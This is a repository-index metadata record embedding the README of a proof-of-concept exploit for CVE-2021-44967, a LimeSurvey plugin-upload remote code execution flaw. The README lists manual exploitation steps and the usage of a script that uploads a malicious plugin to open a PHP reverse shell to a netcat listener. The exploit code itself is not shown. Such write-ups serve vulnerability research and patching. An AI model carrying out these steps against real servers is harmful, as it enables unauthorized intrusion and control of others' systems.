{"id":28003672,"url":"https://github.com/d3ext/cve-2021-44967","last_synced_at":"2025-05-09T02:17:54.093Z","repository":{"id":271871983,"uuid":"912395761","full_name":"D3Ext/CVE-2021-44967","owner":"D3Ext","description":"POC exploit for CVE-2021-44967","archived":false,"fork":false,"pushed_at":"2025-01-10T11:59:26.000Z","size":105,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-09T02:17:51.155Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/D3Ext.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-01-05T13:12:07.000Z","updated_at":"2025-01-10T11:59:34.000Z","dependencies_parsed_at":"2025-01-10T12:59:40.061Z","dependency_job_id":null,"html_url":"https://github.com/D3Ext/CVE-2021-44967","commit_stats":null,"previous_names":["d3ext/limesurvey-rce"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2021-44967","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2021-44967/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2021-44967/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2021-44967/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/D3Ext","download_url":"https://codeload.github.com/D3Ext/CVE-2021-44967/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253176445,"owners_count":21866143,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-05-09T02:17:53.585Z","updated_at":"2025-05-09T02:17:54.078Z","avatar_url":"https://github.com/D3Ext.png","language":"Python","readme":"# CVE-2021-44967\n\nThis repository contains a POC (Proof of Concept) of the CVE-2021-44967 vulnerability, which affects to LimeSurvey 5.2 and higher versions. It allows an authenticated user to upload its own malicious plugins, leading to a RCE (Remote Code Execution) through PHP code execution. This exploit uses a PHP reverse shell which is triggered once the malicious plugin is uploaded.\n\n# Explanation\n\nThis vulnerability consists on creating a XML config file, a PHP file and then compressing them into a ZIP file. Once you have uploaded, installed and activated the plugin, the PHP code should be accessible on the web. It can be exploited manually following this steps:\n\n1. Create a ZIP containing the PHP file and the config file\n2. Login into LimeSurvey\n3. Go to Configuration -\u003e Plugins -\u003e Upload \u0026 Install\n4. Upload your ZIP file\n5. Install it\n6. Finally, activate your plugin\n7. Then your PHP code should be accessible under /upload/plugins/\u003cplugin_name\u003e/\u003cphp_file\u003e\n\n# Usage\n\n```\nusage: exploit.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]\n\nLimeSurvey - RCE\n\noptions:\n  -h, --help           show this help message and exit\n  --url URL            URL of the LimeSurvey web root\n  --user USER          username to log in\n  --password PASSWORD  password of the username\n  --lhost LHOST        local host to receive the reverse shell\n  --lport LPORT        local port to receive the reverse shell\n  --verbose            enable verbose\n```\n\nStart a netcat listener and then execute the exploit like this:\n\n```\npython3 --url \u003cURL\u003e --user \u003cusername\u003e --password \u003cpassword\u003e --lhost \u003clocal host\u003e --lport \u003clocal port\u003e\n```\n\n# Demo\n\n\u003cimg src=\"demo.png\"\u003e\n\n# References\n\n```\nhttps://github.com/Y1LD1R1M-1337/Limesurvey-RCE\nhttps://www.exploit-db.com/exploits/50573\nhttps://github.com/p0dalirius/LimeSurvey-webshell-plugin\nhttps://ine.com/blog/cve-2021-44967-limesurvey-rce\nhttps://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029\n```\n\n# License\n\nThis project is under [MIT](https://github.com/D3Ext/LimeSurvey-RCE/blob/main/LICENSE) license\n\nCopyright © 2025, *D3Ext*\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fcve-2021-44967","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd3ext%2Fcve-2021-44967","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fcve-2021-44967/lists"}